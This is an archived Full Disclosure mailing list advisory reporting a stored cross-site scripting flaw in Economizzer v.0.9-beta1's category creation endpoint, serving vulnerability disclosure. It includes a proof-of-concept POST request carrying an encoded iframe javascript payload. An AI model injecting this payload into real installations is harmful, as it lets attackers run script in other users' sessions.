[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFmK-GziZv9fy_w+OCDLxV6HdGW44pZNAQJQRopk49zTWvd4xw@mail.gmail.com>
Date: Tue, 6 May 2025 20:46:10 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Persistent Cross-Site Scripting in Economizzer Category Entry
A persistent cross-site scripting (XSS) vulnerability exists in gugoan's
Economizzer v.0.9-beta1. The application fails to properly sanitize
user-supplied input when creating a new category via the
*category/create *endpoint.
An attacker can inject malicious JavaScript payloads that are permanently
stored and later executed in the context of any user who views the affected
entry.
https://<host>/web/category/create
POST /web/category/create HTTP/2
Host: <host>
--snip--
Category%5Bdesc_category%5D=%3Ciframe+src%3D%22javascript%3Aalert%283%29%22%3E
--snip--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists